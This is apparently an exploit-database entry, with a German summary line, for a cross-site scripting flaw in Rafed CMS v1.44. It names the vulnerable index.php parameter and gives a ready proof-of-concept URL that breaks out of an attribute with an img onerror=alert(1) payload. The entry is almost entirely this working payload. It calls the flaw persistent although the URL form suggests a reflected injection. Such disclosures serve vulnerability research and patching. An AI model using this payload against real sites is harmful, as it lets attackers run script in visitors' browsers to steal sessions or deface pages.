
Proof-of-concept-Exploit für eine persistente XSS-Schwachstelle in Rafed CMS v1.44, der die Injektion über den index.php-Parameter demonstriert.
Rafed CMS Website v1.44 - Cross-Site-Scripting (XSS)
index.php?">{XSS_Payload] in index.php
https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E